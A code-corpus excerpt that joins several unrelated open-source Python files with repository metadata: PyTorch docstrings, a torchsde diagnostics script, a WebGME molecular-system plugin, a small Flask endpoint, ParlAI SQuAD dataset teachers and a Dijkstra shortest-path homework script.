>>> g_cpu.manual_seed(2147483647)
""")
add_docstr(torch.Generator.initial_seed,
r"""
Generator.initial_seed() -> int
Returns the initial seed for generating random numbers.
Example::
>>> g_cpu = torch.Generator()
>>> g_cpu.initial_seed()
2147483647
""")
add_docstr(torch.Generator.seed,
r"""
Generator.seed() -> int
Gets a non-deterministic random number from std::random_device or the current
time and uses it to seed a Generator.
Example::
>>> g_cpu = torch.Generator()
>>> g_cpu.seed()
1516516984916
""")
add_docstr(torch.Generator.device,
r"""
Generator.device -> device
Gets the current device of the generator.
Example::
>>> g_cpu = torch.Generator()
>>> g_cpu.device
device(type='cpu')
""")
add_docstr(torch._assert_async,
r"""
_assert_async(tensor) -> void
Asynchronously assert that the contents of tensor are nonzero. For CPU tensors,
this is equivalent to ``assert tensor`` or ``assert tensor.is_nonzero()``; for
CUDA tensors, we DO NOT synchronize and you may only find out the assertion
failed at a later CUDA kernel launch. Asynchronous assertion can be helpful for
testing invariants in CUDA tensors without giving up performance. This function
is NOT intended to be used for regular error checking, as it will trash your CUDA
context if the assert fails (forcing you to restart your PyTorch process).
Args:
tensor (Tensor): a one element tensor to test to see if it is nonzero. Zero
elements (including False for boolean tensors) cause an assertion failure
to be raised.
""")
add_docstr(torch.searchsorted,
r"""
searchsorted(sorted_sequence, values, *, out_int32=False, right=False, side='left', out=None, sorter=None) -> Tensor
Find the indices from the *innermost* dimension of :attr:`sorted_sequence` such that, if the
corresponding values in :attr:`values` were inserted before the indices, when sorted, the order
of the corresponding *innermost* dimension within :attr:`sorted_sequence` would be preserved.
Return a new tensor with the same size as :attr:`values`. If :attr:`right` is False or side is
'left' (default), then the left boundary of :attr:`sorted_sequence` is closed. More formally,
the returned index satisfies the following rules:
.. list-table::
:widths: 12 10 78
:header-rows: 1
* - :attr:`sorted_sequence`
- :attr:`right`
- *returned index satisfies*
* - 1-D
- False
- ``sorted_sequence[i-1] < values[m][n]...[l][x] <= sorted_sequence[i]``
* - 1-D
- True
- ``sorted_sequence[i-1] <= values[m][n]...[l][x] < sorted_sequence[i]``
* - N-D
- False
- ``sorted_sequence[m][n]...[l][i-1] < values[m][n]...[l][x] <= sorted_sequence[m][n]...[l][i]``
* - N-D
- True
- ``sorted_sequence[m][n]...[l][i-1] <= values[m][n]...[l][x] < sorted_sequence[m][n]...[l][i]``
Args:
sorted_sequence (Tensor): N-D or 1-D tensor, containing monotonically increasing sequence on the *innermost*
dimension unless :attr:`sorter` is provided, in which case the sequence does not
need to be sorted
values (Tensor or Scalar): N-D tensor or a Scalar containing the search value(s).
Keyword args:
out_int32 (bool, optional): indicate the output data type. torch.int32 if True, torch.int64 otherwise.
Default value is False, i.e. default output data type is torch.int64.
right (bool, optional): if False, return the first suitable location that is found. If True, return the
last such index. If no suitable index is found, return 0 for a non-numerical value
(e.g. nan, inf) or the size of the *innermost* dimension within :attr:`sorted_sequence`
(one past the last index of the *innermost* dimension). In other words, if False,
gets the lower bound index for each value in :attr:`values` on the corresponding
*innermost* dimension of the :attr:`sorted_sequence`. If True, gets the upper
bound index instead. Default value is False. :attr:`side` does the same and is
preferred. It will error if :attr:`side` is set to "left" while this is True.
side (str, optional): the same as :attr:`right` but preferred. "left" corresponds to False for :attr:`right`
and "right" corresponds to True for :attr:`right`. It will error if this is set to
"left" while :attr:`right` is True.
out (Tensor, optional): the output tensor, must be the same size as :attr:`values` if provided.
sorter (LongTensor, optional): if provided, a tensor matching the shape of the unsorted
:attr:`sorted_sequence` containing a sequence of indices that sort it in the
ascending order on the innermost dimension
Example::
>>> sorted_sequence = torch.tensor([[1, 3, 5, 7, 9], [2, 4, 6, 8, 10]])
>>> sorted_sequence
tensor([[ 1, 3, 5, 7, 9],
[ 2, 4, 6, 8, 10]])
>>> values = torch.tensor([[3, 6, 9], [3, 6, 9]])
>>> values
tensor([[3, 6, 9],
[3, 6, 9]])
>>> torch.searchsorted(sorted_sequence, values)
tensor([[1, 3, 4],
[1, 2, 4]])
>>> torch.searchsorted(sorted_sequence, values, side='right')
tensor([[2, 3, 5],
[1, 3, 4]])
>>> sorted_sequence_1d = torch.tensor([1, 3, 5, 7, 9])
>>> sorted_sequence_1d
tensor([1, 3, 5, 7, 9])
>>> torch.searchsorted(sorted_sequence_1d, values)
tensor([[1, 3, 4],
[1, 3, 4]])
""")
add_docstr(torch.bucketize,
r"""
bucketize(input, boundaries, *, out_int32=False, right=False, out=None) -> Tensor
Returns the indices of the buckets to which each value in the :attr:`input` belongs, where the
boundaries of the buckets are set by :attr:`boundaries`. Return a new tensor with the same size
as :attr:`input`. If :attr:`right` is False (default), then the left boundary is closed. More
formally, the returned index satisfies the following rules:
.. list-table::
:widths: 15 85
:header-rows: 1
* - :attr:`right`
- *returned index satisfies*
* - False
- ``boundaries[i-1] < input[m][n]...[l][x] <= boundaries[i]``
* - True
- ``boundaries[i-1] <= input[m][n]...[l][x] < boundaries[i]``
Args:
input (Tensor or Scalar): N-D tensor or a Scalar containing the search value(s).
boundaries (Tensor): 1-D tensor, must contain a monotonically increasing sequence.
Keyword args:
out_int32 (bool, optional): indicate the output data type. torch.int32 if True, torch.int64 otherwise.
Default value is False, i.e. default output data type is torch.int64.
right (bool, optional): if False, return the first suitable location that is found. If True, return the
last such index. If no suitable index is found, return 0 for a non-numerical value
(e.g. nan, inf) or the size of :attr:`boundaries` (one past the last index).
In other words, if False, gets the lower bound index for each value in :attr:`input`
from :attr:`boundaries`. If True, gets the upper bound index instead.
Default value is False.
out (Tensor, optional): the output tensor, must be the same size as :attr:`input` if provided.
Example::
>>> boundaries = torch.tensor([1, 3, 5, 7, 9])
>>> boundaries
tensor([1, 3, 5, 7, 9])
>>> v = torch.tensor([[3, 6, 9], [3, 6, 9]])
>>> v
tensor([[3, 6, 9],
[3, 6, 9]])
>>> torch.bucketize(v, boundaries)
tensor([[1, 3, 4],
[1, 3, 4]])
>>> torch.bucketize(v, boundaries, right=True)
tensor([[2, 3, 5],
[2, 3, 5]])
""")
| 31.774256
| 132
| 0.622418
|
45fbad5188b1cfd2518a807e6444f61981addf51
| 2,201
|
py
|
Python
|
diagnostics/ito_diagonal.py
|
emaballarin/torchsde
|
83373b30c9bd447ec32a8c286c42a4cf5e9753a6
|
[
"Apache-2.0"
] | 984
|
2020-07-06T23:15:17.000Z
|
2022-03-31T10:09:49.000Z
|
diagnostics/ito_diagonal.py
|
GabrielNobis/torchsde
|
53038a3efcd77f6c9f3cfd0310700a59be5d5d2d
|
[
"Apache-2.0"
] | 95
|
2020-07-11T10:53:02.000Z
|
2022-03-30T21:33:56.000Z
|
diagnostics/ito_diagonal.py
|
GabrielNobis/torchsde
|
53038a3efcd77f6c9f3cfd0310700a59be5d5d2d
|
[
"Apache-2.0"
] | 117
|
2020-07-07T20:05:05.000Z
|
2022-03-20T21:30:23.000Z
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import torch
from tests.problems import NeuralDiagonal
from torchsde import BrownianInterval
from torchsde.settings import LEVY_AREA_APPROXIMATIONS
from . import inspection
from . import utils
def main():
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
torch.set_default_dtype(torch.float64)
utils.manual_seed()
small_batch_size, large_batch_size, d = 16, 16384, 5
t0, t1, steps, dt = 0., 2., 10, 1e-1
ts = torch.linspace(t0, t1, steps=steps, device=device)
dts = tuple(2 ** -i for i in range(1, 7)) # For checking strong order.
sde = NeuralDiagonal(d=d).to(device)
methods = ('euler', 'milstein', 'milstein', 'srk')
options = (None, None, dict(grad_free=True), None)
labels = ('euler', 'milstein', 'gradient-free milstein', 'srk')
img_dir = os.path.join(os.path.dirname(__file__), 'plots', 'ito_diagonal')
y0 = torch.full((small_batch_size, d), fill_value=0.1, device=device)
bm = BrownianInterval(
t0=t0, t1=t1, size=(small_batch_size, d), dtype=y0.dtype, device=device,
levy_area_approximation=LEVY_AREA_APPROXIMATIONS.space_time
)
inspection.inspect_samples(y0, ts, dt, sde, bm, img_dir, methods, options, labels)
y0 = torch.full((large_batch_size, d), fill_value=0.1, device=device)
bm = BrownianInterval(
t0=t0, t1=t1, size=(large_batch_size, d), dtype=y0.dtype, device=device,
levy_area_approximation=LEVY_AREA_APPROXIMATIONS.space_time
)
inspection.inspect_orders(y0, t0, t1, dts, sde, bm, img_dir, methods, options, labels)
if __name__ == '__main__':
main()
| 37.948276
| 90
| 0.711949
|
dc954d0946f47b289e79e76910312bb1c47bbefd
| 135
|
py
|
Python
|
mayan/apps/document_comments/tests/literals.py
|
Syunkolee9891/Mayan-EDMS
|
3759a9503a264a180b74cc8518388f15ca66ac1a
|
[
"Apache-2.0"
] | 1
|
2021-06-17T18:24:25.000Z
|
2021-06-17T18:24:25.000Z
|
mayan/apps/document_comments/tests/literals.py
|
Syunkolee9891/Mayan-EDMS
|
3759a9503a264a180b74cc8518388f15ca66ac1a
|
[
"Apache-2.0"
] | 7
|
2020-06-06T00:01:04.000Z
|
2022-01-13T01:47:17.000Z
|
mayan/apps/document_comments/tests/literals.py
|
Syunkolee9891/Mayan-EDMS
|
3759a9503a264a180b74cc8518388f15ca66ac1a
|
[
"Apache-2.0"
] | 1
|
2020-07-29T21:03:27.000Z
|
2020-07-29T21:03:27.000Z
|
from __future__ import unicode_literals
TEST_COMMENT_TEXT = 'test comment text'
TEST_COMMENT_TEXT_EDITED = 'test comment text edited'
| 27
| 53
| 0.837037
|
c0e102fd1d14ca6e810bffc24ee261696ea4d72f
| 7,537
|
py
|
Python
|
src/plugins/createSystems/createSystems/__init__.py
|
umesh-timalsina/molsim-specification
|
9bc5bde5185260eee9592b3efb9fb9148eef85bc
|
[
"MIT"
] | null | null | null |
src/plugins/createSystems/createSystems/__init__.py
|
umesh-timalsina/molsim-specification
|
9bc5bde5185260eee9592b3efb9fb9148eef85bc
|
[
"MIT"
] | 7
|
2020-10-13T19:50:43.000Z
|
2020-10-15T05:22:00.000Z
|
src/plugins/createSystems/createSystems/__init__.py
|
umesh-timalsina/webgme-molsim
|
9bc5bde5185260eee9592b3efb9fb9148eef85bc
|
[
"MIT"
] | null | null | null |
"""
This is where the implementation of the plugin code goes.
The createSystems-class is imported from both run_plugin.py and run_debug.py
"""
import sys
import json
import logging
from .gmso_systems import GMSOSystems
from webgme_bindings import PluginBase
# Setup a logger
logger = logging.getLogger('createSystems')
logger.setLevel(logging.INFO)
handler = logging.StreamHandler(sys.stdout) # By default it logs to stderr..
handler.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)
DEFAULT_ATTR = 'pyJSON'
class createSystems(PluginBase):
def main(self):
core = self.core
root_node = self.root_node
active_node = self.active_node
name = core.get_attribute(active_node, 'name')
logger.info('ActiveNode at "{0}" has name {1}'.format(core.get_path(active_node), name))
for system in GMSOSystems.systems():
self.convert_to_nodes(system)
commit_info = self.util.save(root_node, self.commit_hash, 'master', 'Python plugin updated the model')
logger.info('committed :{0}'.format(commit_info))
def convert_to_nodes(self, topology):
system = self.core.create_node(
{
'parent': self.active_node,
'base': self.META.get('System')
}
)
self.core.set_attribute(system, name='name', value=topology.name)
self.logger.info(f'Created system node with name {topology.name}')
atom_nodes = {}
atom_type_nodes = self._add_potential_nodes(
system,
topology,
potential_attr='_atom_types',
target='AtomType'
)
self.logger.info(f'Added {len(atom_type_nodes)} AtomTypes')
bond_type_nodes = self._add_potential_nodes(
system,
topology,
potential_attr='_bond_types',
target='BondType'
)
self.logger.info(f'Added {len(bond_type_nodes)} BondTypes')
angle_type_nodes = self._add_potential_nodes(
system,
topology,
potential_attr='_angle_types',
target='AngleType'
)
self.logger.info(f'Added {len(angle_type_nodes)} AngleTypes')
dihedral_type_nodes = self._add_potential_nodes(
system,
topology,
potential_attr='_dihedral_types',
target='DihedralType'
)
self.logger.info(f'Added {len(dihedral_type_nodes)} DihedralTypes')
improper_type_nodes = self._add_potential_nodes(
system,
topology,
potential_attr='_improper_types',
target='ImproperType'
)
self.logger.info(f'Added {len(improper_type_nodes)} ImproperTypes')
for atom in topology.sites:
atom_nodes[id(atom)] = self.core.create_node({
'parent': system,
'base': self.META.get('Atom')
})
self.core.set_attribute(
atom_nodes[id(atom)], name='name', value=atom.name
)
for key in self.core.get_valid_attribute_names(atom_nodes[id(atom)]):
json_dict = json.loads(atom.json(by_alias=True))
if key in json_dict:
self.core.set_attribute(
atom_nodes[id(atom)],
name=key,
value=str(json_dict.get(key))
)
if atom.atom_type is not None:
atype_node = atom_type_nodes[atom.atom_type]
self.core.set_pointer(
atom_nodes[id(atom)],
name='potential',
target=atype_node
)
for bond in topology.bonds:
atom_1 = atom_nodes[id(bond.connection_members[0])]
atom_2 = atom_nodes[id(bond.connection_members[1])]
src = self.core.create_node({
'parent': atom_1,
'base': self.META.get('AtomPort')
})
dst = self.core.create_node({
'parent': atom_2,
'base': self.META.get('AtomPort')
})
bond = self.core.create_node({
'parent': system,
'base': self.META.get('Bond')
})
self.core.set_pointer(bond, name='src', target=src)
self.core.set_pointer(bond, name='dst', target=dst)
self._add_connection_nodes(system,
topology,
atom_nodes,
connection_attr='angles',
target='Angle')
self._add_connection_nodes(system,
topology,
atom_nodes,
connection_attr='dihedrals',
target='Dihedral')
self._add_connection_nodes(system,
topology,
atom_nodes,
connection_attr='impropers',
target='Improper')
def _add_potential_nodes(self,
parent,
topology,
potential_attr='_atom_types',
target='AtomType'):
potential_types = getattr(topology, potential_attr)
potential_type_nodes = {}
for potential_type in potential_types.values():
potential_node = self.core.create_node({
'parent': parent,
'base': self.META.get(target)
})
self._assign_attributes_to_node(
py_object=potential_type,
target_node=potential_node
)
potential_type_nodes[potential_type] = potential_node
return potential_type_nodes
def _assign_attributes_to_node(self, py_object, target_node):
for key in self.core.get_valid_attribute_names(target_node):
json_str = py_object.json(by_alias=True)
json_dict = json.loads(json_str)
if key in json_dict:
self.core.set_attribute(
target_node,
name=key,
value=str(json_dict.get(key))
)
self.core.set_attribute(target_node, name=DEFAULT_ATTR, value=json_str)
def _add_connection_nodes(self,
parent,
topology,
atom_nodes,
connection_attr='angles',
target='Angle'):
connections = getattr(topology, connection_attr)
for connection in connections:
atoms = [atom_nodes[id(atom)] for atom in connection.connection_members]
connection_node = self.core.create_node({
'parent': parent,
'base': self.META.get(target)
})
self._assign_attributes_to_node(
py_object=connection,
target_node=connection_node
)
for atom in atoms:
self.core.add_member(
node=connection_node,
name='connectionMembers',
member=atom
)
| 34.573394
| 110
| 0.532042
|
e9b47d7a88c576faa5e502c2cbff443c76d7688b
| 323
|
py
|
Python
|
app.py
|
brayton-anderson/loanapp_python_backend
|
d76406459b76be09541fccea805ec57a3a14dd36
|
[
"MIT"
] | null | null | null |
app.py
|
brayton-anderson/loanapp_python_backend
|
d76406459b76be09541fccea805ec57a3a14dd36
|
[
"MIT"
] | null | null | null |
app.py
|
brayton-anderson/loanapp_python_backend
|
d76406459b76be09541fccea805ec57a3a14dd36
|
[
"MIT"
] | null | null | null |
from flask import Flask, jsonify, request
import time
app = Flask(__name__)
@app.route("/loans", method=["POST"])
# responce
def response():
query = dict(request.form)['query']
result = query + " " + time.ctime()
return jsonify({"response": result})
if __name__ == "__main__":
app.run(host="0.0.0.0",)
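# A minimal client sketch (hypothetical, not part of the original app): the
# endpoint above expects form data with a "query" field, so a local test could
# look like this, assuming Flask's default port 5000:
#
#     import requests
#     r = requests.post("http://127.0.0.1:5000/loans", data={"query": "loan status"})
#     print(r.json())   # {"response": "loan status <current time>"}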
| 19
| 41
| 0.637771
|
1a42a49302e54a2093eefe2b7226982a2bc67688
| 13,920
|
py
|
Python
|
parlai/tasks/squad/agents.py
|
Saraharas/ParlAI
|
9cb89024a5852e68c81466a70f16f692de8cff97
|
[
"MIT"
] | 1
|
2020-12-22T23:20:05.000Z
|
2020-12-22T23:20:05.000Z
|
parlai/tasks/squad/agents.py
|
Saraharas/ParlAI
|
9cb89024a5852e68c81466a70f16f692de8cff97
|
[
"MIT"
] | null | null | null |
parlai/tasks/squad/agents.py
|
Saraharas/ParlAI
|
9cb89024a5852e68c81466a70f16f692de8cff97
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import copy
import json
import os
from parlai.core.message import Message
from parlai.core.opt import Opt
from parlai.core.teachers import FixedDialogTeacher, DialogTeacher, ParlAIDialogTeacher
from parlai.tasks.wrapper.agents import AbstractWrapperTeacher
from parlai.utils.io import PathManager
from .build import build
def get_sentence_tokenizer():
"""
Loads the nltk sentence tokenizer.
"""
try:
import nltk
except ImportError:
raise ImportError('Please install nltk (e.g. pip install nltk).')
# nltk-specific setup
st_path = 'tokenizers/punkt/{0}.pickle'.format('english')
try:
sent_tok = nltk.data.load(st_path)
except LookupError:
nltk.download('punkt')
sent_tok = nltk.data.load(st_path)
return sent_tok
class IndexTeacher(FixedDialogTeacher):
"""
Hand-written SQuAD teacher, which loads the json squad data and implements its own
`act()` method for interacting with student agent, rather than inheriting from the
core Dialog Teacher. This code is here as an example of rolling your own without
inheritance.
This teacher also provides access to the "answer_start" indices that specify the
location of the answer in the context.
"""
def __init__(self, opt, shared=None):
build(opt)
super().__init__(opt, shared)
if self.datatype.startswith('train'):
suffix = 'train'
else:
suffix = 'dev'
datapath = os.path.join(opt['datapath'], 'SQuAD', suffix + '-v1.1.json')
self.data = self._setup_data(datapath)
self.id = 'squad'
self.reset()
def num_examples(self):
return len(self.examples)
def num_episodes(self):
return self.num_examples()
def get(self, episode_idx, entry_idx=None):
article_idx, paragraph_idx, qa_idx = self.examples[episode_idx]
article = self.squad[article_idx]
paragraph = article['paragraphs'][paragraph_idx]
qa = paragraph['qas'][qa_idx]
question = qa['question']
answers = []
answer_starts = []
for a in qa['answers']:
answers.append(a['text'])
answer_starts.append(a['answer_start'])
context = paragraph['context']
action = {
'id': 'squad',
'text': context + '\n' + question,
'labels': answers,
'episode_done': True,
'answer_starts': answer_starts,
}
return action
def _setup_data(self, path):
with PathManager.open(path) as data_file:
self.squad = json.load(data_file)['data']
self.examples = []
for article_idx in range(len(self.squad)):
article = self.squad[article_idx]
for paragraph_idx in range(len(article['paragraphs'])):
paragraph = article['paragraphs'][paragraph_idx]
num_questions = len(paragraph['qas'])
for qa_idx in range(num_questions):
self.examples.append((article_idx, paragraph_idx, qa_idx))
class DefaultTeacher(DialogTeacher):
"""
This version of SQuAD inherits from the core Dialog Teacher, which just requires it
to define an iterator over its data `setup_data` in order to inherit basic metrics,
a default `act` function.
For SQuAD, this does not efficiently store the paragraphs in memory.
"""
def __init__(self, opt, shared=None):
self.datatype = opt['datatype']
build(opt)
if opt['datatype'].startswith('train'):
suffix = 'train'
else:
suffix = 'dev'
opt['datafile'] = os.path.join(opt['datapath'], 'SQuAD', suffix + '-v1.1.json')
self.id = 'squad'
super().__init__(opt, shared)
def setup_data(self, path):
print('loading: ' + path)
with PathManager.open(path) as data_file:
self.squad = json.load(data_file)['data']
for article in self.squad:
# each paragraph is a context for the attached questions
for paragraph in article['paragraphs']:
# each question is an example
for qa in paragraph['qas']:
question = qa['question']
answers = tuple(a['text'] for a in qa['answers'])
context = paragraph['context']
yield (context + '\n' + question, answers), True
class OpensquadTeacher(DialogTeacher):
"""
This version of SQuAD inherits from the core Dialog Teacher, which just requires it
to define an iterator over its data `setup_data` in order to inherit basic metrics,
a default `act` function.
Note: This teacher omits the context paragraph
"""
def __init__(self, opt, shared=None):
self.datatype = opt['datatype']
build(opt)
if opt['datatype'].startswith('train'):
suffix = 'train'
else:
suffix = 'dev'
opt['datafile'] = os.path.join(opt['datapath'], 'SQuAD', suffix + '-v1.1.json')
self.id = 'squad'
super().__init__(opt, shared)
def setup_data(self, path):
print('loading: ' + path)
with PathManager.open(path) as data_file:
self.squad = json.load(data_file)['data']
for article in self.squad:
# each paragraph is a context for the attached questions
for paragraph in article['paragraphs']:
# each question is an example
for qa in paragraph['qas']:
question = qa['question']
answers = (a['text'] for a in qa['answers'])
yield (question, answers), True
class TitleTeacher(DefaultTeacher):
"""
This version of SquAD inherits from the Default Teacher.
The only
difference is that the 'text' field of an observation will contain
the title of the article separated by a newline from the paragraph and the
query.
Note: The title will contain underscores, as it is the part of the link for
the Wikipedia page; i.e., the article is at the site:
https://en.wikipedia.org/wiki/{TITLE}
Depending on your task, you may wish to remove underscores.
"""
def __init__(self, opt, shared=None):
self.id = 'squad_title'
build(opt)
super().__init__(opt, shared)
def setup_data(self, path):
print('loading: ' + path)
with PathManager.open(path) as data_file:
self.squad = json.load(data_file)['data']
for article in self.squad:
title = article['title']
# each paragraph is a context for the attached questions
for paragraph in article['paragraphs']:
# each question is an example
for qa in paragraph['qas']:
question = qa['question']
answers = (a['text'] for a in qa['answers'])
context = paragraph['context']
yield ('\n'.join([title, context, question]), answers), True
class FulldocTeacher(ParlAIDialogTeacher):
def __init__(self, opt, shared=None):
build(opt)
opt = copy.deepcopy(opt)
if opt['datatype'].startswith('train'):
suffix = 'train'
else:
suffix = 'valid'
datafile = os.path.join(
opt['datapath'], 'SQuAD-fulldoc', "squad_fulldocs." + suffix + ":ordered"
)
opt['parlaidialogteacher_datafile'] = datafile
super().__init__(opt, shared)
self.id = 'squad-fulldoc'
self.reset()
class SentenceTeacher(IndexTeacher):
"""
Teacher where the label(s) are the sentences that contain the true answer.
Some punctuation may be removed from the context and the answer for
tokenization purposes.
If `include_context` is False, the teacher returns action dict in the
following format:
{
'context': <context>,
'text': <question>,
'labels': <sentences containing the true answer>,
'label_candidates': <all sentences in the context>,
'episode_done': True,
'answer_starts': <index of start of answer in context>
}
Otherwise, the 'text' field contains <context>\n<question> and there is
no separate context field.
"""
def __init__(self, opt, shared=None):
super().__init__(opt, shared)
self.sent_tok = get_sentence_tokenizer()
self.include_context = opt.get('include_context', False)
@staticmethod
def add_cmdline_args(argparser):
agent = argparser.add_argument_group('SQuAD Sentence Teacher Arguments')
agent.add_argument(
'--include-context',
type='bool',
default=False,
help='include context within text instead of as a ' 'separate field',
)
def get(self, episode_idx, entry_idx=None):
article_idx, paragraph_idx, qa_idx = self.examples[episode_idx]
article = self.squad[article_idx]
paragraph = article['paragraphs'][paragraph_idx]
qa = paragraph['qas'][qa_idx]
context = paragraph['context']
question = qa['question']
answers = [a['text'] for a in qa['answers']]
# remove '.', '?', '!' from answers for proper sentence
# tokenization
edited_answers = []
for answer in answers:
new_answer = answer.replace('.', '').replace('?', '').replace('!', '')
context = context.replace(answer, new_answer)
edited_answers.append(new_answer)
edited_sentences = self.sent_tok.tokenize(context)
labels = []
label_starts = []
for sentence in edited_sentences:
for answer in edited_answers:
if answer in sentence and sentence not in labels:
labels.append(sentence)
label_starts.append(context.index(sentence))
break
action = {
'context': context,
'text': question,
'labels': labels,
'label_candidates': edited_sentences,
'episode_done': True,
'answer_starts': label_starts,
}
if self.include_context:
action['text'] = action['context'] + '\n' + action['text']
del action['context']
return action
class FulldocsentenceTeacher(FulldocTeacher):
"""
Teacher which contains the question as the text, the sentences as the label
candidates, and the label as the sentence containing the answer.
Some punctuation may be removed for tokenization purposes.
If `include_context` is False, the teacher returns action dict in the
following format:
{
'context': <context>,
'text': <question>,
'labels': <sentences containing the true answer>,
'label_candidates': <all sentences in the context>,
'episode_done': True,
'answer_starts': <index of start of answer in context>
}
Otherwise, the 'text' field contains <context>\n<question> and there is
no separate context field.
"""
def __init__(self, opt, shared=None):
super().__init__(opt, shared)
self.sent_tok = get_sentence_tokenizer()
self.include_context = opt.get('include_context', False)
@staticmethod
def add_cmdline_args(argparser):
agent = argparser.add_argument_group('SQuAD Fulldoc Sentence Teacher Arguments')
agent.add_argument(
'--include-context',
type='bool',
default=False,
help='include context within text instead of as a ' 'separate field',
)
def get(self, episode_idx, entry_idx=None):
action = {}
episode = self.episodes[episode_idx][entry_idx]
context = ' '.join(episode['text'].split('\n')[:-1]).replace(
'\xa0', ' '
) # get rid of non breaking space characters
question = episode['text'].split('\n')[-1]
label_field = 'labels' if 'labels' in episode else 'eval_labels'
answers = []
for answer in episode[label_field]:
new_answer = answer.replace('.', '').replace('?', '').replace('!', '')
context = context.replace(answer, new_answer)
answers.append(new_answer)
sentences = self.sent_tok.tokenize(context)
labels = []
label_starts = []
for sentence in sentences:
for answer in answers:
if answer in sentence and sentence not in labels:
labels.append(sentence)
label_starts.append(context.index(sentence))
action = {
'context': context,
'text': question,
label_field: labels,
'answer_starts': label_starts,
'label_candidates': sentences,
'episode_done': episode['episode_done'],
}
if self.include_context:
action['text'] = action['context'] + '\n' + action['text']
del action['context']
return action
class SquadQATeacher(AbstractWrapperTeacher):
"""
Wrapper Teacher over SQuAD to get only the passage, and ignore the question.
"""
@classmethod
def add_cmdline_args(cls, parser):
parser.set_defaults(wrapper_task='squad')
def __init__(self, opt: Opt, shared=None):
super().__init__(opt, shared)
def _edit_action(self, act: Message) -> Message:
"""
SQuAD returns both passage and question; only the passage is required for this task.
"""
passage = act['text'].split('\n')[0]
act.force_set('text', passage)
return act
| 34.8
| 88
| 0.602874
|
002c5a90899ee455debe44ddf682e52a2558eee3
| 4,113
|
py
|
Python
|
Homework/Dijkstra.py
|
RobinYaoWenbin/python-
|
9607219b8d057ab896ecae5326daadd7dcfb6112
|
[
"MIT"
] | 12
|
2020-09-28T03:25:03.000Z
|
2022-03-20T07:44:09.000Z
|
Homework/Dijkstra.py
|
RobinYaoWenbin/python-
|
9607219b8d057ab896ecae5326daadd7dcfb6112
|
[
"MIT"
] | null | null | null |
Homework/Dijkstra.py
|
RobinYaoWenbin/python-
|
9607219b8d057ab896ecae5326daadd7dcfb6112
|
[
"MIT"
] | 21
|
2020-03-19T00:44:35.000Z
|
2022-01-30T03:46:18.000Z
|
# -*- coding: utf-8 -*-
"""
Created on Fri Sep 27 13:08:39 2019
@author: wenbin
"""
"""
this program implements Dijkstra's algorithm
Note: the nodes in this code are the indices of the list; to stay consistent with Python, indexing starts at 0. If the problem numbers nodes from 1, add 1 to the parent-node indices.
"""
class Dijkstra():
def __init__(self , AdjacencyMatrix , StartVertex):
self.AdjMat = AdjacencyMatrix
self.Vs = StartVertex
print("Dijkstra algotithm start seccessfully , the matrix is:")
print(self.AdjMat)
print("the start vertex is:" , self.Vs )
def DijkstraProcess(self):
"""
this function runs Dijkstra's algorithm on the class's data
"""
Msize = len(self.AdjMat) # number of rows of the input matrix
Vt = [] # set of vertices whose shortest distance is already settled
Uvt = [] # set of vertices not yet settled
dis = [] # tentative weight / distance of each vertex
dis_certain = [] # settled weight of each vertex
pv = [] # parent node of each vertex
for i in range(Msize):
dis.append(float("inf"))
dis_certain.append(float("inf"))
pv.append(None)
dis[self.Vs] = 0
for i in range(Msize):
MinValue = min(dis)
MinIndex = dis.index(MinValue)
dis_certain[MinIndex] = MinValue
dis[MinIndex] = float("inf")
Vt.append(MinIndex) # add the newly settled vertex to Vt
for j in range(Msize):
if (j != MinIndex and j not in set(Vt)) and self.AdjMat[MinIndex][j] < 1000000000: # relax only edges whose weight is finite (less than inf)
if dis_certain[MinIndex] + self.AdjMat[MinIndex][j] < dis[j]:
dis[j] = dis_certain[MinIndex] + self.AdjMat[MinIndex][j]
pv[j] = MinIndex
print("distance" , dis_certain) #各个节点的最短路,列表中的index就是节点的编号
print("pv" , pv) #各个节点的父节点,从0开始计数
def TestData():
# initialize the adjacency matrix
AdjacencyMatrix = [[0, 1, 4 , float("inf"), float("inf")],
[1, 0, float("inf"), 2, float("inf")],
[1, float("inf"), 0, float("inf"), 1],
[float("inf"), 3, float("inf"), 0, 3],
[float("inf"), float("inf"), float("inf"), 2, 0]]
StartVertex = 0 # start vertex of the shortest path
return AdjacencyMatrix , StartVertex
def OR17homework():
# this example is problem 10.7 from the operations research textbook
AdjacencyMatrix = [[0, 2, float("inf") ,8, float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf")],
[float("inf"), 0, float("inf"), 6,1, float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf")],
[1, float("inf"), 0, float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf")],
[float("inf"),float("inf"), 7,0, float("inf"), float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf")],
[float("inf"), float("inf"), float("inf"), 5, 0,float("inf"), float("inf"), float("inf"), 1,float("inf"), float("inf")],
[float("inf"), float("inf"), float("inf"), 1, 3,0,4,float("inf"), float("inf"), float("inf"),float("inf")],
[float("inf"), float("inf"), float("inf"), 2,float("inf"), float("inf"), 0,float("inf"),3,1,float("inf")],
[float("inf"),float("inf"),float("inf"),float("inf"),2,float("inf"),float("inf"),0,float("inf"),float("inf"),9],
[float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),6 , float("inf"),7,0,float("inf"),float("inf")],
[float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),1,0,4],
[float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),2,float("inf"),0]]
StartVertex = 0 # start vertex of the shortest path
return AdjacencyMatrix , StartVertex
if __name__ == "__main__":
# AdjacencyMatrix , StartVertex = TestData()
AdjacencyMatrix , StartVertex = OR17homework()
DijExample = Dijkstra(AdjacencyMatrix , StartVertex)
DijExample.DijkstraProcess()
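# Editor's sketch (not part of the original homework): the pv list printed by
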